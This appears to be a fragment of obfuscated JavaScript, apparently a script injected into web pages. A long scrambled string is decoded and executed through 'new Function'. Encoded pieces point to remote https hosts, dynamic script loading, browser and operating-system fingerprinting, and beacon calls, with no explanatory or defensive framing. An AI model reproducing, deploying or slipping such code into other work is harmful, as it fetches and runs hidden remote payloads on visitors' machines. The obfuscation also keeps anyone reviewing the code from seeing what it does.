F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();